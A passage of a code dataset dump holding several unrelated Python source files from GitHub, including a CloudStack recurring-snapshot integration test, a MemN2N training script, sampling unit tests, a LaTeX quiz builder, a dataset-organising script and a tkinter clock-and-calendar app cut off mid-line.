DiskOffering,\n ServiceOffering,\n VirtualMachine,\n SnapshotPolicy)\nfrom marvin.lib.common import (get_zone,\n get_domain,\n get_template,\n list_snapshots,\n list_volumes,\n list_snapshot_policy\n )\nimport time\n\n\nclass Services:\n\n \"\"\"Test Snapshots Services\n \"\"\"\n\n def __init__(self):\n self.services = {\n \"account\": {\n \"email\": \"test@test.com\",\n \"firstname\": \"Test\",\n \"lastname\": \"User\",\n \"username\": \"test\",\n # Random characters are appended for unique\n # username\n \"password\": \"password\",\n },\n \"service_offering\": {\n \"name\": \"Tiny Instance\",\n \"displaytext\": \"Tiny Instance\",\n \"cpunumber\": 1,\n \"cpuspeed\": 200, # in MHz\n \"memory\": 256, # In MBs\n },\n \"disk_offering\": {\n \"displaytext\": \"Small Disk\",\n \"name\": \"Small Disk\",\n \"disksize\": 1\n },\n \"server_with_disk\":\n {\n \"displayname\": \"Test VM -With Disk\",\n \"username\": \"root\",\n \"password\": \"password\",\n \"ssh_port\": 22,\n \"hypervisor\": 'XenServer',\n \"privateport\": 22,\n \"publicport\": 22,\n \"protocol\": 'TCP',\n },\n\n \"server_without_disk\":\n {\n \"displayname\": \"Test VM-No Disk\",\n \"username\": \"root\",\n \"password\": \"password\",\n \"ssh_port\": 22,\n \"hypervisor\": 'XenServer',\n \"privateport\": 22,\n # For NAT rule creation\n \"publicport\": 22,\n \"protocol\": 'TCP',\n },\n \"server\": {\n \"displayname\": \"TestVM\",\n \"username\": \"root\",\n \"password\": \"password\",\n \"ssh_port\": 22,\n \"hypervisor\": 'XenServer',\n \"privateport\": 22,\n \"publicport\": 22,\n \"protocol\": 'TCP',\n },\n \"mgmt_server\": {\n \"ipaddress\": '192.168.100.21',\n \"username\": \"root\",\n \"password\": \"password\",\n \"port\": 22,\n },\n \"recurring_snapshot\": {\n \"intervaltype\": 'HOURLY',\n # Frequency of snapshots\n \"maxsnaps\": 2, # Should be min 2\n \"schedule\": 1,\n \"timezone\": 'US/Arizona',\n # Timezone Formats -\n # http://cloud.mindtouch.us/CloudStack_Documentation/Developer's_Guide%3A_CloudStack\n },\n \"templates\": {\n \"displaytext\": 'Template',\n \"name\": 'Template',\n \"ostype\": \"CentOS 5.3 (64-bit)\",\n \"templatefilter\": 'self',\n },\n \"volume\": {\n \"diskname\": \"APP Data Volume\",\n \"size\": 1, # in GBs\n # Data Disk\n \"diskdevice\": ['/dev/xvdb', '/dev/sdb',\n '/dev/hdb', '/dev/vdb'],\n },\n \"paths\": {\n \"mount_dir\": \"/mnt/tmp\",\n \"sub_dir\": \"test\",\n \"sub_lvl_dir1\": \"test1\",\n \"sub_lvl_dir2\": \"test2\",\n \"random_data\": \"random.data\",\n },\n \"ostype\": \"CentOS 5.3 (64-bit)\",\n # Cent OS 5.3 (64 bit)\n \"sleep\": 60,\n \"timeout\": 10,\n }\n\n\nclass TestRecurringSnapshots(cloudstackTestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.testClient = super(TestRecurringSnapshots, cls).getClsTestClient()\n cls.api_client = cls.testClient.getApiClient()\n\n cls._cleanup = []\n\n cls.unsupportedHypervisor = False\n cls.hypervisor = cls.testClient.getHypervisorInfo()\n if cls.hypervisor.lower() in ['hyperv', \"lxc\"]:\n cls.unsupportedHypervisor = True\n return\n\n cls.services = Services().services\n # Get Zone, Domain and templates\n cls.domain = get_domain(cls.api_client)\n cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())\n cls.services['mode'] = cls.zone.networktype\n cls.disk_offering = DiskOffering.create(\n cls.api_client,\n cls.services[\"disk_offering\"]\n )\n cls._cleanup.append(cls.disk_offering)\n template = get_template(\n cls.api_client,\n cls.zone.id,\n cls.services[\"ostype\"]\n )\n\n cls.services[\"domainid\"] = cls.domain.id\n cls.services[\"server_with_disk\"][\"zoneid\"] = cls.zone.id\n cls.services[\"server_with_disk\"][\"diskoffering\"] = cls.disk_offering.id\n\n cls.services[\"server_without_disk\"][\"zoneid\"] = cls.zone.id\n\n cls.services[\"templates\"][\"ostypeid\"] = template.ostypeid\n cls.services[\"zoneid\"] = cls.zone.id\n cls.services[\"diskoffering\"] = cls.disk_offering.id\n\n # Create VMs, NAT Rules etc\n cls.account = Account.create(\n cls.api_client,\n cls.services[\"account\"],\n domainid=cls.domain.id\n )\n cls._cleanup.append(cls.account)\n\n cls.services[\"account\"] = cls.account.name\n\n cls.service_offering = ServiceOffering.create(\n cls.api_client,\n cls.services[\"service_offering\"]\n )\n cls._cleanup.append(cls.service_offering)\n cls.virtual_machine_with_disk = \\\n VirtualMachine.create(\n cls.api_client,\n cls.services[\"server_with_disk\"],\n templateid=template.id,\n accountid=cls.account.name,\n domainid=cls.account.domainid,\n serviceofferingid=cls.service_offering.id\n )\n cls.virtual_machine_without_disk = \\\n VirtualMachine.create(\n cls.api_client,\n cls.services[\"server_without_disk\"],\n templateid=template.id,\n accountid=cls.account.name,\n domainid=cls.account.domainid,\n serviceofferingid=cls.service_offering.id\n )\n return\n\n @classmethod\n def tearDownClass(cls):\n try:\n # Cleanup resources used\n cleanup_resources(cls.api_client, cls._cleanup)\n except Exception as e:\n raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n return\n\n def setUp(self):\n self.apiclient = self.testClient.getApiClient()\n self.dbclient = self.testClient.getDbConnection()\n self.cleanup = []\n\n if self.unsupportedHypervisor:\n self.skipTest(\"Snapshots feature is not supported on Hyper-V/LXC\")\n return\n\n def tearDown(self):\n try:\n # Clean up, terminate the created instance, volumes and snapshots\n cleanup_resources(self.apiclient, self.cleanup)\n except Exception as e:\n raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n return\n\n @attr(speed=\"slow\")\n @attr(tags=[\"advanced\", \"advancedns\", \"basic\"], required_hardware=\"true\")\n def test_recurring_snapshot_root_disk(self):\n \"\"\"Test Recurring Snapshot Root Disk\n \"\"\"\n # 1. Create snapshot policy for root disk\n # 2. ListSnapshot policy should return newly created policy\n # 3. Verify only most recent number (maxsnaps) snapshots retailed\n\n volume = list_volumes(\n self.apiclient,\n virtualmachineid=self.virtual_machine_without_disk.id,\n type='ROOT',\n listall=True\n )\n self.assertEqual(\n isinstance(volume, list),\n True,\n \"Check list response returns a valid list\"\n )\n recurring_snapshot = SnapshotPolicy.create(\n self.apiclient,\n volume[0].id,\n self.services[\"recurring_snapshot\"]\n )\n self.cleanup.append(recurring_snapshot)\n\n # ListSnapshotPolicy should return newly created policy\n list_snapshots_policy = list_snapshot_policy(\n self.apiclient,\n id=recurring_snapshot.id,\n volumeid=volume[0].id\n )\n self.assertEqual(\n isinstance(list_snapshots_policy, list),\n True,\n \"Check list response returns a valid list\"\n )\n self.assertNotEqual(\n list_snapshots_policy,\n None,\n \"Check if result exists in list item call\"\n )\n snapshots_policy = list_snapshots_policy[0]\n self.assertEqual(\n snapshots_policy.id,\n recurring_snapshot.id,\n \"Check recurring snapshot id in list resources call\"\n )\n self.assertEqual(\n snapshots_policy.maxsnaps,\n self.services[\"recurring_snapshot\"][\"maxsnaps\"],\n \"Check interval type in list resources call\"\n )\n\n max_snapshots = self.services[\"recurring_snapshot\"][\"maxsnaps\"]\n # Sleep for (max_snapshots*2) hours to verify\n # only maxsnaps snapshots are retained\n time.sleep(\n (max_snapshots * 2) * 3600\n )\n\n timeout = self.services[\"timeout\"]\n while True:\n snapshots = list_snapshots(\n self.apiclient,\n volumeid=volume[0].id,\n intervaltype=self.services[\"recurring_snapshot\"]\n [\"intervaltype\"],\n snapshottype='RECURRING',\n listall=True)\n\n if isinstance(snapshots, list):\n break\n\n elif timeout == 0:\n raise Exception(\"List snapshots API call failed.\")\n\n time.sleep(1)\n timeout = timeout - 1\n\n self.assertEqual(\n isinstance(snapshots, list),\n True,\n \"Check list response returns a valid list\"\n )\n\n self.assertEqual(\n len(snapshots),\n max_snapshots,\n \"Check maximum number of recurring snapshots retained\"\n )\n return\n\n @attr(speed=\"slow\")\n @attr(tags=[\"advanced\", \"advancedns\", \"basic\"], required_hardware=\"true\")\n def test_recurring_snapshot_data_disk(self):\n \"\"\"Test Recurring Snapshot data Disk\n \"\"\"\n # 1. Create snapshot policy for data disk\n # 2. ListSnapshot policy should return newly created policy\n # 3. Verify only most recent number (maxsnaps) snapshots retailed\n\n volume = list_volumes(\n self.apiclient,\n virtualmachineid=self.virtual_machine_with_disk.id,\n type='DATADISK',\n listall=True\n )\n\n self.assertEqual(\n isinstance(volume, list),\n True,\n \"Check list response returns a valid list\"\n )\n\n recurring_snapshot = SnapshotPolicy.create(\n self.apiclient,\n volume[0].id,\n self.services[\"recurring_snapshot\"]\n )\n self.cleanup.append(recurring_snapshot)\n # ListSnapshotPolicy should return newly created policy\n list_snapshots_policy = list_snapshot_policy(\n self.apiclient,\n id=recurring_snapshot.id,\n volumeid=volume[0].id\n )\n\n self.assertEqual(\n isinstance(list_snapshots_policy, list),\n True,\n \"Check list response returns a valid list\"\n )\n\n self.assertNotEqual(\n list_snapshots_policy,\n None,\n \"Check if result exists in list item call\"\n )\n snapshots_policy = list_snapshots_policy[0]\n self.assertEqual(\n snapshots_policy.id,\n recurring_snapshot.id,\n \"Check recurring snapshot id in list resources call\"\n )\n self.assertEqual(\n snapshots_policy.maxsnaps,\n self.services[\"recurring_snapshot\"][\"maxsnaps\"],\n \"Check interval type in list resources call\"\n )\n\n max_snapshots = self.services[\"recurring_snapshot\"][\"maxsnaps\"]\n # Sleep for (maxsnaps) hours to verify only maxsnaps snapshots are\n # retained\n time.sleep(\n (max_snapshots * 2) * 3600\n )\n\n timeout = self.services[\"timeout\"]\n while True:\n snapshots = list_snapshots(\n self.apiclient,\n volumeid=volume[0].id,\n intervaltype=self.services[\"recurring_snapshot\"]\n [\"intervaltype\"],\n snapshottype='RECURRING',\n listall=True)\n\n if isinstance(snapshots, list):\n break\n\n elif timeout == 0:\n raise Exception(\"List snapshots API call failed.\")\n\n time.sleep(1)\n timeout = timeout - 1\n\n self.assertEqual(\n isinstance(snapshots, list),\n True,\n \"Check list response returns a valid list\"\n )\n self.assertEqual(\n len(snapshots),\n max_snapshots,\n \"Check maximum number of recurring snapshots retained\"\n )\n return\n","repo_name":"apache/cloudstack","sub_path":"test/integration/component/test_recurring_snapshots.py","file_name":"test_recurring_snapshots.py","file_ext":"py","file_size_in_byte":13749,"program_lang":"python","lang":"en","doc_type":"code","stars":1557,"dataset":"github-code","pt":"32"} +{"seq_id":"71139132250","text":"\"\"\" Nome do módulo : GraphDrawer\n Ano de criação : 2019/10\n Descrição do módulo : Desenha o Grafo em tela\n Versão : 1.0\n Pré-requisitos : GridGraph\n Membros : Lorena Bassani\n\"\"\"\nfrom .Graph import GridGraph\nclass GridDrawer(object):\n @staticmethod\n def draw_tile(graph, c, style, width):\n r = \".\"\n if 'number' in style and c in style['number']: r = \"%d\" % style['number'][c]\n if 'point_to' in style and style['point_to'].get(graph.transform2Grid(c), None) is not None:\n (x1, y1) = c\n (x2, y2) = graph.transform2Cart(style['point_to'][graph.transform2Grid(c)])\n if x2 == x1 + 1: r = \">\"\n if x2 == x1 - 1: r = \"<\"\n if y2 == y1 + 1: r = \"v\"\n if y2 == y1 - 1: r = \"^\"\n if 'start' in style and c == style['start']: r = \"A\"\n if 'goal' in style and c == style['goal']: r = \"Z\"\n if 'path' in style and c in style['path']: r = \"@\"\n if c in list(map(lambda x : graph.transform2Cart(x), graph.whatIsOccupied())) : r = \"#\" * width\n return r\n\n @staticmethod\n def draw_grid(graph, width=2, **style):\n nx, ny = graph.grid\n for y in range(ny):\n for x in range(nx):\n print(\"%%-%ds\" % width % GridDrawer.draw_tile(graph, (x, y), style, width), end=\"\")\n print()\n","repo_name":"erufes/erus-vsss-python","sub_path":"scripts/PathPlanning/DrawingGrid.py","file_name":"DrawingGrid.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"37876056111","text":"import os\nimport pprint\nimport tensorflow as tf\n\nfrom data import read_data\nfrom model import MemN2N\n\npp = pprint.PrettyPrinter()\n\nflags = tf.app.flags\n\nflags.DEFINE_integer(\"edim\", 100, \"internal state dimension [100]\")\nflags.DEFINE_integer(\"nhop\", 2, \"number of hops [2]\")\nflags.DEFINE_integer(\"mem_size\", 20, \"memory size [20]\")\nflags.DEFINE_integer(\"batch_size\", 128, \"batch size to use during training [128]\")\nflags.DEFINE_integer(\"nepoch\", 20, \"number of epoch to use during training [20]\")\nflags.DEFINE_float(\"init_lr\", 0.01, \"initial learning rate [0.01]\")\nflags.DEFINE_float(\"init_hid\", 0.1, \"initial internal state value [0.1]\")\nflags.DEFINE_float(\"init_std\", 0.05, \"weight initialization std [0.05]\")\nflags.DEFINE_float(\"max_grad_norm\", 50, \"clip gradients to this norm [50]\")\nflags.DEFINE_string(\"data_dir\", \"data\", \"data directory [data]\")\nflags.DEFINE_string(\"checkpoint_dir\", \"checkpoints\", \"checkpoint directory [checkpoints]\")\nflags.DEFINE_string(\"data_name\", \"qa1\", \"data set name qa#\")\nflags.DEFINE_boolean(\"is_test\", False, \"True for testing, False for Training [False]\")\n# flags.DEFINE_string(\"log_dir\", \"./board/test3\", \"log dir for tenserboard\")\n\nFLAGS = flags.FLAGS\n\ndef main(_):\n count = []\n word2idx = {}\n\n if not os.path.exists(FLAGS.checkpoint_dir):\n os.makedirs(FLAGS.checkpoint_dir)\n\n train_data, train_query, train_target, train_idx = read_data('%s/%s_train.txt' % (FLAGS.data_dir, FLAGS.data_name), count, word2idx, FLAGS.mem_size)\n valid_data, valid_query, valid_target, valid_idx = read_data('%s/%s_valid.txt' % (FLAGS.data_dir, FLAGS.data_name), count, word2idx, FLAGS.mem_size)\n test_data, test_query, test_target, test_idx = read_data('%s/%s_test.txt' % (FLAGS.data_dir, FLAGS.data_name), count, word2idx, FLAGS.mem_size)\n\n idx2word = dict(zip(word2idx.values(), word2idx.keys()))\n\n max = 0\n for i in train_data, valid_data, test_data:\n if len(i) > max:\n max = len(i)\n\n FLAGS.max_len = max # the longest sentence length\n FLAGS.nwords = len(word2idx)\n\n pp.pprint(flags.FLAGS.__flags)\n\n with tf.Session() as sess:\n model = MemN2N(FLAGS, sess)\n model.build_model()\n\n if FLAGS.is_test:\n model.run(valid_data, valid_query, valid_target, valid_idx, test_data, test_query, test_target, test_idx)\n else:\n model.run(train_data, train_query, train_target, train_idx, valid_data, valid_query, valid_target, valid_idx)\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"changhyub/MemN2N-QA-TensorFlow","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"629987842","text":"import numpy as np\nimport pytest\nimport torch\n\nfrom meb.datasets import NoisyUniformTemporalSubsample, UniformTemporalSubsample\n\n\n@pytest.mark.parametrize(\n \"sampling_class_type\", [UniformTemporalSubsample, NoisyUniformTemporalSubsample]\n)\n@pytest.mark.parametrize(\"frame_number\", [8, 12, 50, 100])\n@pytest.mark.parametrize(\"array_type\", [torch.ones, np.ones])\ndef test_sampling(sampling_class_type, frame_number, array_type):\n num_samples = 8\n x = array_type((frame_number, 3, 16, 16))\n sampler = sampling_class_type(num_samples)\n output = sampler(x)\n assert output.shape[0] == num_samples\n\n\n@pytest.mark.parametrize(\n \"sampling_class_type\", [UniformTemporalSubsample, NoisyUniformTemporalSubsample]\n)\n@pytest.mark.parametrize(\"frame_number\", [0, 2, 7])\n@pytest.mark.parametrize(\"array_type\", [torch.ones, np.ones])\ndef test_incorrect_sampling(sampling_class_type, frame_number, array_type):\n num_samples = 8\n x = array_type((frame_number, 3, 16, 16))\n sampler = sampling_class_type(num_samples)\n with pytest.raises(AssertionError):\n sampler(x)\n\n\n@pytest.mark.parametrize(\n \"sampling_class_type\", [UniformTemporalSubsample, NoisyUniformTemporalSubsample]\n)\n@pytest.mark.parametrize(\"array_type\", [torch.ones, np.ones])\ndef test_incorrect_shape(sampling_class_type, array_type):\n num_samples = 8\n sampler = sampling_class_type(num_samples)\n x = array_type((8, 16, 16))\n with pytest.raises(IndexError):\n sampler(x)\n\n x = array_type((3, 16, 16, 8))\n with pytest.raises(AssertionError):\n sampler(x)\n\n\n@pytest.mark.parametrize(\"backend\", [torch, np])\ndef test_noisy_uniform(backend):\n num_samples = 8\n np.random.seed(0)\n u_sampler = UniformTemporalSubsample(num_samples)\n nu_sampler = NoisyUniformTemporalSubsample(num_samples)\n x = backend.ones((100, 3, 16, 16))\n for i, a in enumerate(x):\n a *= i\n assert backend.all(u_sampler(x)[1:-1] != nu_sampler(x)[1:-1])\n","repo_name":"tvaranka/meb","sub_path":"tests/test_data/test_sampling.py","file_name":"test_sampling.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"16460207439","text":"# ----------------------------- CONFIG -----------------------------------------------------------\r\n\r\n\r\ntitle = \"ALGORITHM\" #! TITLE CHOSEN IN scrapper.py\r\nskip_images = False #! False IF DONT WANT OR ALREADY HAVE IMAGES\r\npdflatex = True #! True IF YOU HAVE pdflatex\r\n\r\n# ------------------------------- CODE -----------------------------------------------------------\r\n\r\n# ? Imports\r\nimport os\r\nimport json\r\nimport requests\r\nfrom PIL import Image\r\nfrom io import BytesIO\r\n\r\n\r\n# ? Load the Json file created by scrapper\r\nwith open(f\"./{title}/{title}.json\", \"r\") as f:\r\n final_details = json.load(f)\r\n\r\nurl = \"https://practicepaper.in\"\r\n\r\n\r\n# ? Whole latex written in this string\r\nlatex = \"\"\r\n\r\n\r\nlatex += r\"\\documentclass{exam}\" + \"\\n\"\r\nlatex += r\"\\title{\" + title + \"}\" + \"\\n\"\r\nlatex += r\"\\date{}\" + \"\\n\"\r\nlatex += r\"\\usepackage{graphicx}\" + \"\\n\"\r\nlatex += r\"\\usepackage{amsmath}\" + \"\\n\"\r\nlatex += r\"\\usepackage{amssymb}\" + \"\\n\"\r\nlatex += r\"\\usepackage[T1]{fontenc}\" + \"\\n\"\r\nlatex += r\"\\newcommand\\tab[1][1cm]{\\hspace*{#1}}\" + \"\\n\"\r\nlatex += r\"\\begin{document}\" + \"\\n\"\r\nlatex += r\"\" + \"\\n\"\r\nlatex += r\"\\maketitle\" + \"\\n\"\r\n\r\n\r\nfor topic in final_details:\r\n # ? Each topic has its own section\r\n latex += r\"\\section{\" + topic + \"}\\n\"\r\n\r\n # ? Questions\r\n latex += r\"\\begin{questions}\" + \"\\n\"\r\n\r\n # ? Question Text\r\n for question in final_details[topic]:\r\n latex += (\r\n f\"\\\\question {question['text']} \\\\textbf\" + \"{[\" + question[\"year\"] + \"]}\\n\"\r\n )\r\n\r\n # ? Download and insert image\r\n if question[\"image\"]:\r\n if not skip_images:\r\n response = requests.get(url + question[\"image\"])\r\n\r\n Image.open(BytesIO(response.content)).convert(\"RGB\").save(\r\n f\"./{title}/\" + question[\"number\"] + \".jpg\"\r\n )\r\n\r\n latex += f\"\"\" \\\\begin{'{figure}'}[!hb]\r\n\\\\centering\r\n\\\\includegraphics[width=0.5\\linewidth,height=0.5\\linewidth, keepaspectratio]{'{'+ question['number']+'.jpg' +'}'}\r\n\\\\end{'{figure}'} \\n\"\"\"\r\n\r\n # ? Answers\r\n latex += r\"\\begin{choices}\" + \"\\n\"\r\n for answer in question[\"answers\"]:\r\n latex += r\"\\choice \" + question[\"answers\"][answer] + \"\\n\\\\newline\\n\"\r\n latex += r\"\\end{choices}\" + \"\\n\"\r\n\r\n latex += r\"\\end{questions}\" + \"\\n\"\r\n\r\n\r\n# ? After all topics, a section for answers\r\nlatex += r\"\\section{\" + \"Answers\" + \"}\\n\"\r\nfor topic in final_details:\r\n latex += r\"\\subsection{\" + topic + \"}\\n\"\r\n latex += r\"\\begin{enumerate}\" + \"\\n\"\r\n for question in final_details[topic]:\r\n latex += r\"\\item \" + f\" {','.join(question['correct_ans'])}\\n\"\r\n latex += r\"\\end{enumerate}\" + \"\\n\"\r\n\r\nlatex += r\"\\end{document}\" + \"\\n\"\r\n\r\n# ? Save the file in tex format\r\ntext_file = open(f\"./{title}/{title}.tex\", \"w\")\r\ntext_file.write(latex)\r\ntext_file.close()\r\n\r\n# ? If pdflatex is available run its command to generate pdf\r\nif pdflatex:\r\n cmd = r\"pdflatex -quiet \" + '\"' + title + \".tex\" + '\"'\r\n os.chdir(f\"./{title}\")\r\n os.system(cmd)\r\n","repo_name":"Saksham1970/PracticePaper-LaTeX","sub_path":"Latexer.py","file_name":"Latexer.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5162979560","text":"# =============================================================================\n# To distribute train, valid, test for SODA\n# =============================================================================\n\nimport os\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom glob import glob\nimport shutil\nimport argparse\n\n\ndef is_image_file(filename):\n return any(\n filename.endswith(extension) for extension in [\".png\", \".jpg\", \".jpeg\", \".bmp\"]\n )\n\n\ndef str2bool(v):\n if v.lower() in (\"yes\", \"true\", \"t\", \"y\", \"1\"):\n return True\n elif v.lower() in (\"no\", \"false\", \"f\", \"n\", \"0\"):\n return False\n else:\n raise argparse.ArgumentTypeError(\"Boolean value expected.\")\n\n\n# %%\n# =============================================================================\n# Copying files to different folders\n# =============================================================================\ndef copying(tiles, path_label, basepath, fileset_path):\n tiles.set_index(path_label, inplace=True)\n for img_path in tiles.index:\n print(\"Path = {}\".format(img_path))\n dst_path = os.path.join(basepath, fileset_path)\n\n shutil.copy(img_path, dst_path)\n\n\n# %%\n# =============================================================================\n# Creating folders\n# =============================================================================\n\n\ndef distribute(input_dir, output_dir, reset):\n # basepath = './Thermal_Segmentation/Dataset/Cityscapes_thermal/TIR_leftImg8bit/'\n basepath = input_dir\n\n # os.path.abspath(os.path.join(basepath,'..'))\n base_dir = os.path.join(output_dir, \"CITYSCAPE_5000\")\n if reset == True and os.path.exists(base_dir):\n shutil.rmtree(base_dir)\n if not os.path.exists(base_dir):\n os.mkdir(base_dir)\n\n main_dirs_image = [\"image/train\"]\n main_dirs_mask = [\"mask/train\"]\n\n for main in main_dirs_image:\n\n path = os.path.join(base_dir, main)\n if not os.path.exists(path):\n os.makedirs(path)\n\n for main in main_dirs_mask:\n\n path = os.path.join(base_dir, main)\n if not os.path.exists(path):\n os.makedirs(path)\n\n # %%\n # =============================================================================\n # Creating folders\n # =============================================================================\n\n imageid_path_dict = {\n os.path.splitext(os.path.basename(x))[0]: x\n for x in glob(os.path.join(basepath, \"**\", \"**\", \"*.jpg\"), recursive=True)\n }\n\n tile_df = pd.DataFrame(\n imageid_path_dict.items(), columns=[\"Image_Name\", \"Image_Path\"]\n )\n tile_df = tile_df.sort_values(\n by=\"Image_Name\", axis=0, ascending=True, kind=\"quicksort\"\n ).reset_index(drop=True)\n tile_df = tile_df.fillna(\"NA\")\n tile_df[\"Mask_Path\"] = tile_df[\"Image_Path\"].str.replace(\".jpg\", \".png\")\n tile_df[\"Mask_Path\"] = tile_df[\"Mask_Path\"].str.replace(\n \"TIR_leftImg8bit\", \"TIR_leftImg8bit/gtFine\"\n )\n tile_df[\"Mask_Path\"] = tile_df[\"Mask_Path\"].str.replace(\n \"leftImg8bit_synthesized_image\", \"gtFine_labelIds\"\n )\n tile_df[\"Mask_Name\"] = tile_df[\"Image_Name\"].str.replace(\n \"leftImg8bit_synthesized_image\", \"gtFine_labelIds\"\n )\n\n # https://stackoverflow.com/questions/28679930/how-to-drop-rows-from-pandas-data-frame-that-contains-a-particular-string-in-a-p\n # https://stackoverflow.com/questions/41425945/python-pandas-error-missing-unterminated-subpattern-at-position-2\n tile_df = tile_df[\n ~tile_df.Image_Name.str.contains(\"\\(\")\n ] # there are copies of some files, eg, ABCD.png and ABCD (1).png (I am removing the copies)\n # there are copies of some files, eg, ABCD.png and ~temp_ABCD.png (I am removing the copies)\n tile_df = tile_df[~tile_df.Image_Name.str.contains(\"\\~\")]\n\n copying(\n tiles=tile_df,\n path_label=\"Image_Path\",\n basepath=base_dir,\n fileset_path=main_dirs_image[0],\n )\n copying(\n tiles=tile_df,\n path_label=\"Mask_Path\",\n basepath=base_dir,\n fileset_path=main_dirs_mask[0],\n )\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Set up Cityscape Dataset\")\n parser.add_argument(\n \"--input-image-path\",\n type=str,\n default=\"/mnt/1842213842211C4E/raw_dataset/SODA-20211127T202136Z-001/SODA/TIR_leftImg8bit/\",\n help=\"Path to Cityscape Dataset. Note: This should lead to TIR_leftImg8bit\",\n )\n parser.add_argument(\n \"--save-path\",\n type=str,\n default=\"/mnt/1842213842211C4E/processed_dataset/\",\n help=\"Path to Cityscape Dataset\",\n )\n parser.add_argument(\n \"--reset\", type=bool, default=True, help=\"Path to Cityscape Dataset\"\n )\n\n args = parser.parse_args()\n distribute(\n input_dir=args.input_image_path,\n output_dir=args.save_path,\n reset=args.reset,\n )\n","repo_name":"shreyaskamathkm/FTNet","sub_path":"Codes/src/datasets/utils/Cityscape_folderMap.py","file_name":"Cityscape_folderMap.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"32"} +{"seq_id":"43701972112","text":"import calendarParse\r\n\r\nimport tkinter\r\nimport customtkinter\r\nimport time\r\nfrom time import strftime\r\nimport datetime\r\nimport calendar\r\n\r\n\r\n\r\n\r\n\r\nclass clockFrame(customtkinter.CTkFrame):\r\n def __init__(self, master, **kwargs):\r\n super().__init__(master, **kwargs)\r\n \r\n self.noto = customtkinter.CTkFont(family='Noto Sans KR',size=80)\r\n self.notobold = customtkinter.CTkFont(family='Noto Sans KR', size=150, weight='bold')\r\n self.day_label = customtkinter.CTkLabel(master=self,anchor='se')\r\n self.clock_label = customtkinter.CTkLabel(master=self,anchor='sw')\r\n #self.grid_columnconfigure((0,1), weight=1)\r\n self.clockUpdate()\r\n\r\n def clockUpdate(self):\r\n time_string = strftime('%H:%M:%S')\r\n self.clock_label.configure(text=time_string, font=self.notobold)\r\n\r\n day_string = strftime('%m.%d. %a')\r\n self.day_label.configure(text=day_string, font=self.noto)\r\n\r\n self.day_label.place(relx=0.25,y=185,anchor='s')\r\n self.clock_label.place(relx=0.7,y=200,anchor='s')\r\n self.after(1000, self.clockUpdate)\r\n\r\nclass calendarFrame(customtkinter.CTkFrame):\r\n def __init__(self, master, **kwargs):\r\n super().__init__(master, **kwargs)\r\n\r\n self.userid = dict()\r\n self.now = datetime.datetime.now()\r\n self.todays_calendar = calendar.Calendar()\r\n self.todays_calendar.setfirstweekday(6)\r\n self.day_list = self.todays_calendar.monthdatescalendar(self.now.year, self.now.month)\r\n self.columnconfigure((0,1,2,3,4,5,6),weight=1,uniform='gay')\r\n self.rowconfigure((1,2,3,4,5),weight=1,uniform='gay')\r\n\r\n self.marked_day = self.now.date()\r\n\r\n self.cal_font = customtkinter.CTkFont(family='Noto Sans KR', size = 20)\r\n\r\n self.color_list = {'offday':'gray50', 'default':'azure', 'sun':'firebrick3', 'sat':'dodger blue', 'event':'OliveDrab1'}\r\n self.weekday_list = ['Sun','Mon','Tue','Wed','Thu','Fri','Sat']\r\n\r\n self.label_list = [[customtkinter.CTkLabel(master=self,pady=20,font=self.cal_font,text='wd') for i in range(7)]]+[[customtkinter.CTkLabel(master=self,anchor='nw',padx=10,font=self.cal_font,text='day',justify='left', wraplength=200) for i in range(7)] for j in range(len(self.day_list))]\r\n self.label_text_list = []\r\n\r\n rtn = []\r\n for i in range(7):\r\n self.label_list[0][i].configure(text=self.weekday_list[i], text_color=self.color_list['default'], fg_color='gray15')\r\n rtn.append(textManager(self.weekday_list[i], (self.color_list['default'], self.color_list['event']), ('gray15', 'gray15')))\r\n self.label_text_list.append(rtn)\r\n\r\n for i in range(len(self.day_list)):\r\n rtn = []\r\n for j in range(7):\r\n today = self.day_list[i][j]\r\n clr = self.colorPalette(today)\r\n ec = self.color_list['event']\r\n fgc = ('gray40', 'gray30')\r\n self.label_list[i+1][j].configure(text=today.day, text_color = clr)\r\n rtn.append(textManager(today, (clr,ec), fgc))\r\n\r\n self.label_text_list.append(rtn)\r\n\r\n for i in range(len(self.day_list)+1):\r\n for j in range(7):\r\n self.label_list[i][j].grid(row=i,column=j,sticky='nsew',padx=2,pady=2)\r\n \r\n self.eventUpdate()\r\n self.calendarUpdate()\r\n \r\n\r\n def calendarUpdate(self):\r\n self.now = datetime.datetime.now()\r\n self.todays_calendar = calendar.Calendar()\r\n self.todays_calendar.setfirstweekday(6)\r\n self.day_list = self.todays_calendar.monthdatescalendar(self.now.year, self.now.month)\r\n\r\n for i in range(len(self.day_list)):\r\n for j in range(7):\r\n current_value = self.label_text_list[i+1][j]\r\n color = current_value.getColor()\r\n self.label_list[i+1][j].configure(text = current_value.getText(), fg_color=color[1], text_color=color[0])\r\n \r\n self.after(30000,self.calendarUpdate)\r\n\r\n\r\n def colorPalette(self, d):\r\n if d.month != self.now.month:\r\n return self.color_list['offday']\r\n if d.weekday() == 6:\r\n return self.color_list['sun']\r\n if d.weekday() == 5:\r\n return self.color_list['sat']\r\n return self.color_list['default']\r\n \r\n def eventUpdate(self):\r\n for i in self.label_text_list:\r\n for j in i:\r\n j.clearEvent()\r\n \r\n self.event_list = calendarParse.getiCal()\r\n linear_date = [j for sub in self.day_list for j in sub]\r\n for event in self.event_list:\r\n for i in range(len(linear_date)):\r\n starttime = event.start\r\n endtime = event.end\r\n today = linear_date[i]\r\n if starttime.date() == today:\r\n today_text = self.label_text_list[i//7+1][i%7]\r\n txt = '\\n{1}-{2}\\n{0}'.format(event.summary, 